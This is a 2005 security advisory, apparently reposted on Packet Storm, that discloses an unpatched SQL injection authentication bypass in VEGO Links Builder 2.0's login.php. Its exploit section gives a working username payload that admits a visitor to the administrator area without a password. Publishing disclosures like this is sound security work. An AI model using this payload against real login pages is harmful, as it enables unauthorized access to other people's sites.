EV0002.txt

2006-01-04T00:00:00
ID PACKETSTORM:42764
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
VEGO Links Builder Authentication Bypass  
  
--------------------Summary----------------  
Vendor: VEGO  
Software: VEGO Links Builder  
Versions: 2.0  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2005.12.29  
eVuln ID: EV0002  
  
-----------------Description--------------  
Vulnerable scripts:  
login.php  
  
Variable $username isn't properly sanitized before being used in a SQL query. This can be used to enter administrator area without password.  
  
Conditions: magic_quotes_gpc = off  
  
--------------Exploit---------------------  
Link:  
http://host/links/login.php  
  
username: a' or 'a'='a'/*  
password: anypassword  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/2/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
`